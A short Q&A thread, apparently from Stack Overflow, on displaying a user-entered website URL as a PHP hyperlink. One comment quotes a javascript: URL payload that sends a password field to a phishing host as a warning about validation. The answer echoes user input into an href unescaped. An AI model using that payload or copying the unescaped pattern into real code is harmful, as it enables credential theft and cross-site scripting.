# PHP form field user input web or file address result page displays a hyperlink

Tags: php, html

I have a simple PHP database form that collects users information. one of the field allows the user to enter their website URL address. How can I get the result page to display the URL field as a hyperlink?

Thank you

Comment: Just add your url in <a> tag.

Comment: Please post what you have tried so far. Don't let others program for you. See also [how to ask good questions](http://stackoverflow.com/help/how-to-ask).

Comment: For a start you will need to validate any data that users enter, else someone might add `javascript:var x = document.getElementById('password').innerHTML;window.location='http://nasty-phishing-site.com?pass='+x;` as their url

Answer (score 0):

I think this is what you need:

```
<a href="<?php echo $link; ?>"><?php echo $linkName; ?></a>
```

http://www.w3schools.com/tags/att_a_href.asp